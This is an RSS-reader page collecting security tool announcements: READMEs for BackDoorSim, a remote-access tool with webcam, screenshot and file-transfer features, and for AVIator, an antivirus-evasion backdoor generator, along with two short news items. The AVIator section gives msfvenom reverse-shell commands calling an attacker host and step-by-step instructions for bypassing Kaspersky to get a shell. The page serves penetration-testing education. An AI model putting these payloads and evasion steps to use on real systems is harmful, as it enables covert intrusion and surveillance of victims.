FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
☷
β–³ πŸ”ƒ
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

BackDoorSim - An Educational Into Remote Administration Tools

By: Zion3R


BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.


Disclaimer

This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.


Features
  • File Transfer: Upload and download files between server and client.
  • Screenshot Capture: Take screenshots from the client's system.
  • System Information Gathering: Retrieve detailed system and security software information.
  • Camera Access: Capture images from the client's webcam.
  • Notifications: Send and display notifications on the client system.
  • Help Menu: Easy access to command information and usage.

Installation

To set up BackdoorSim, you will need to install it on both the server and client machines.

  1. Clone the repository:

shell $ git clone https://github.com/HalilDeniz/BackDoorSim.git

  1. Navigate to the project directory:

shell $ cd BackDoorSim

  1. Install the required dependencies:

shell $ pip install -r requirements.txt


Usage

After starting both the server and client, you can use the following commands in the server's command prompt:

  • upload [file_path]: Upload a file to the client.
  • download [file_path]: Download a file from the client.
  • screenshot: Capture a screenshot from the client.
  • sysinfo: Get system information from the client.
  • securityinfo: Get security software status from the client.
  • camshot: Capture an image from the client's webcam.
  • notify [title] [message]: Send a notification to the client.
  • help: Display the help menu.

Disclaimer

BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.


DepNot: RansomwareSim

If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool


BackdoorSim: An Educational into Remote Administration Tools

If you want to read our article about Backdoor


Contributing

Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.


Contact

For any inquiries or further information, you can reach me through the following channels:



Leaked EU Document Shows Spain Wants to Ban End-to-End Encryption

By: Lily Hay Newman, Morgan Meaker, Matt Burgess
In response to an EU proposal to scan private messages for illegal material, the country's officials said it is β€œimperative that we have access to the data.”

Tracers in the Dark: The Global Hunt for the Crime Lords of Crypto

By: Paul Ducklin
Hear renowned cybersecurity author Andy Greenberg's thoughtful commentary about the "war on crypto" as we talk to him about his new book...

AVIator - Antivirus Evasion Project

By: noreply@blogger.com (Unknown)


AviAtor Ported to NETCore 5 with an updated UI


AV|Ator

About://name

AV: AntiVirus

Ator: Is a swordsman, alchemist, scientist, magician, scholar, and engineer, with the ability to sometimes produce objects out of thin air (https://en.wikipedia.org/wiki/Ator)

About://purpose

AV|Ator is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:

  • It uses AES encryption in order to encrypt a given shellcode
  • Generates an executable file which contains the encrypted payload
  • The shellcode is decrypted and injected to the target system using various injection techniques

[https://attack.mitre.org/techniques/T1055/]:

  1. Portable executable injection which involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.

  2. Thread execution hijacking which involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.


Usage

The application has a form which consists of three main inputs (See screenshot bellow):

  1. A text containing the encryption key used to encrypt the shellcode
  2. A text containing the IV used for AES encryption
  3. A text containing the shellcode

Important note: The shellcode should be provided as a C# byte array.

The default values contain shellcode that executes notepad.exe (32bit). This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.

RTLO option

In simple words, spoof an executable file to look like having an "innocent" extention like 'pdf', 'txt' etc. E.g. the file "testcod.exe" will be interpreted as "tesexe.doc"

Beware of the fact that some AVs alert the spoof by its own as a malware.

Set custom icon

I guess you all know what it is :)

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)

Getting a shell in a windows 10 machine running fully updated kaspersky AV

Target Machine: Windows 10 x64

  1. Create the payload using msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Use AVIator with the following settings

    Target OS architecture: x64

    Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)

    Target procedure: explorer (leave the default)

  3. Set the listener on the attacker machine

  4. Run the generated exe on the victim machine

Installation

Windows:

Either compile the project or download the allready compiled executable from the following folder:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

Install Mono according to your linux distribution, download and run the binaries

e.g. in kali:

   root@kali# apt install mono-devel 

   root@kali# mono aviator.exe

Credits

To Damon Mohammadbagher for the encryption procedure

Disclaimer

I developed this app in order to overcome the demanding challenges of the pentest process and this is the ONLY WAY that this app should be used. Make sure that you have the required permission to use it against a system and never use it for illegal purposes.



❌